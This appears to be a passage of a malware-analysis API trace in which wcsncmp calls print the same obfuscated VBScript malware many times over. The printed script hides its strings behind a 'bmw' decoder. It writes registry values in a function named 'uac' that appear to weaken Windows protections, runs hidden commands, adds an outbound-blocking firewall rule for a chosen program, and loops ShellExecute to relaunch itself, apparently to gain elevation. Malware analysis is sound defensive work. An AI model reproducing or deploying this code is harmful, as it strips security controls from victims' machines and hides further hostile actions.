bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.003] wcsncmp (_String1="r(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.003] wcsncmp (_String1="(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0223.003] wcsncmp (_String1="rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.003] wcsncmp (_String1="ule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.003] wcsncmp (_String1="le.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add 